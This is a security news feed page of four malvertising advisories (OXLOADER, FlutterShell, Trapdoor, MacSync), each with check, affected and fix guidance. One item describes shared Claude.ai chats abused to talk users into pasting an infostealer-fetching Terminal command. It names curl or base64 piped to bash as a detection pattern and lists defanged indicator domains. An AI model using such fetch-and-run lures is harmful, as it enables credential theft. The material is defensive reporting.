Last updated: July 5, 2026 at 9:01 AM UTC
All 557 Vulnerability 199 Breach 106 Threat 245 Defense 7
Tag: malvertising (4 articles)Clear

OXLOADER malvertising poses as Node.js installer to drop an infostealer

Elastic Security Labs detailed OXLOADER, a previously undocumented Windows loader that reaches victims through malicious Google Ads impersonating the Node.js download page and other developer tools. A developer searching for Node.js clicks a sponsored result, lands on a convincing fake site, and runs a script that quietly installs the loader, which then deploys an in-memory infostealer called CastleStealer to harvest credentials and other data. OXLOADER is heavily obfuscated, runs several anti-analysis checks, and skips machines set to Russian or in Russian-aligned regions, pointing to a financially motivated Russian-speaking operator. Google removed the advertiser account, but the technique of buying ads against developer searches remains widespread.

Check
Remind developers and staff not to install tools from sponsored search ads, and check endpoints for unexpected installs that began with a downloaded Node.js or developer-tool installer from a non-official site.
Affected
Developers and technical users who search for tools like Node.js and click sponsored ads leading to fake download sites; the payload is an infostealer that harvests credentials and sensitive data.
Fix
Download developer tools only from official project sites or package managers, use ad-blocking or DNS filtering to cut malvertising, and deploy endpoint detection that flags in-memory loaders and credential-stealing behavior.

FlutterShell macOS backdoor spreads via Google and YouTube ads from verified shell companies - CL-CRI-1089 / TamperedChef adware-to-backdoor

Palo Alto Networks Unit 42 has documented FlutterShell, a Flutter-built macOS backdoor distributed through malicious Google and YouTube ads served by a network of Google-verified shell companies. It is the latest stage of the CL-CRI-1089 cluster and part of the broader TamperedChef / EvilAI campaigns that push trojanized productivity software. The ads lure macOS users in the US, Canada, Australia, France, and Germany into installing fake desktop apps. Beyond adware, FlutterShell supports arbitrary shell-command execution, file-system manipulation, and environment-variable exfiltration, and on launch modifies Chrome config files to force browser traffic through an attacker-controlled intermediary. Activity was seen as recently as March 2026.

Check
Warn macOS users that Google/YouTube ads for productivity apps may be malicious. Hunt for Flutter-built apps that modify Chrome config files. Apply Unit 42 IoCs.
Affected
macOS users in the US, Canada, Australia, France, and Germany lured by malvertised fake desktop apps. FlutterShell adds backdoor command execution and Chrome-hijacking on top of adware.
Fix
Source software only from official vendor sites, not search ads. Apply Unit 42 IoCs and block the ad domains. Restore Chrome config on affected Macs and remove the apps.

Trapdoor Android ad fraud: 455 apps, 24M downloads, 659M daily bid requests, selective activation via attribution tools

HUMAN Security has detailed Trapdoor, an Android ad-fraud and malvertising operation that pushed 455 apps with more than 24 million combined Play Store downloads and drove an average of 659 million daily ad-bid requests, three-quarters of them from US devices. The operators run their own ad campaigns to recruit victims, then use legitimate install-attribution tools to switch on fraud only for users who came in through those campaigns, suppressing the bad behavior for anyone who installed organically - which kept Google's reviewers and most security researchers in the dark. Google has now removed all identified apps from the Play Store.

Check
Use MDM to inventory any Trapdoor app from HUMAN's published list on managed Android devices. Look for outbound traffic to HTML5 cashout domains in your DNS logs.
Affected
Android users who downloaded Trapdoor apps after clicking attribution-tagged ads. The campaign is invisible to users who installed the same apps organically.
Fix
MDM-uninstall the named apps and block their package IDs. Restrict Android sideloading on managed devices. Review attribution-provider settings to limit click campaigns' ability to flag malicious behavior.

Mac malware campaign uses Google ads and 'Apple Support' Claude.ai chats to install infostealer

Hackers are buying Google ads that look like they go to claude.ai - and they do go to a real claude.ai page. But the page is a shared Claude chat dressed up as 'Apple Support' walking users through installing Claude on a Mac. The instructions tell people to paste a command into Terminal that quietly downloads MacSync, a Mac infostealer that grabs saved browser passwords, cookies, and contents of macOS Keychain (where Mac stores logins and keys). Because both the ad and the page are real claude.ai links, there is no fake domain to spot. Researcher Berk Albayrak first reported the campaign; BleepingComputer found a second active variant.

Check
Check macOS endpoint logs for Terminal executions of curl or base64 piped to bash in the last 7 days, and review who clicked sponsored Google results for 'Claude mac download'.
Affected
macOS users who searched Google for 'Claude mac download' or similar terms and ran a Terminal command from a shared Claude.ai chat attributed to 'Apple Support'. Two payload variants seen: a MacSync infostealer that exfiltrates Keychain and browser secrets, and a polymorphic in-memory shell payload that profiles the host and delivers a second stage via osascript.
Fix
Rotate browser-saved passwords and macOS Keychain credentials for any user who may have run the malicious command. Sign out and re-authenticate browser sessions to invalidate stolen cookies. Block the indicator domains customroofingcontractors[.]com and bernasibutuwqu2[.]com at network egress. Reinforce with users that they should never install software from chat or terminal instructions - only from official vendor download pages.